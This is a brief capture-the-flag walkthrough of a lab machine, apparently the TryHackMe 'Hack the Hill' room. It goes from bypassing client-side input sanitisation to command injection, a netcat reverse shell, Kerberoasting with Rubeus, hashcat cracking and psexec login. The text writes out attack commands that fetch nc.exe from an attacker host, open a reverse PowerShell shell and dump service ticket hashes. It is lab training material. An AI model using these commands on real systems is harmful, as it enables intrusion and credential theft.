Sign in

Hack the hill #1 medium

  1. Network enumeration -sC -sT -vv <ip>

Check the website and create new account

click to profile and try to change username with different characters(; ? | “ :) if its available.

You cant able to add with those characters.

Now check the inspect elements, in the network

you can see directory of some script.

When you block this url, the input login now will not sanitize.

As of now we can able to input some payloads or commands.

And now our plan is to put a listener in the system of Victim machine.

To copy/transfer the nc.exe we are going to use python

“python -m http.server”

And we can input this command “powershell curl <ip>:8000/nc.exe -o nc.exe” on the victim website

Aright…

Let setup a new listener with netcat..

nc -lvnp 4343

We will run now “nc.exe <ip> <port> -e powershell” to gain reverse shell..

And now we have shell..

lets check the users

Lets prepare Rubeus.exe, tool that we will use to gain priv esc..

set listener so we can transfer Rubeus.exe on our victim machine.
curl <ip><port/8000 as default of httphandler>/Rubeus.exe -o Rubeus.exe
We will now execute this command “.\Rubeus.exe kerberoast /nowrap”

now lets crack “# hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt”

Now lets use “psexec.py”

psexec.py troy.thm/achilles:(password)@<ip>

and done..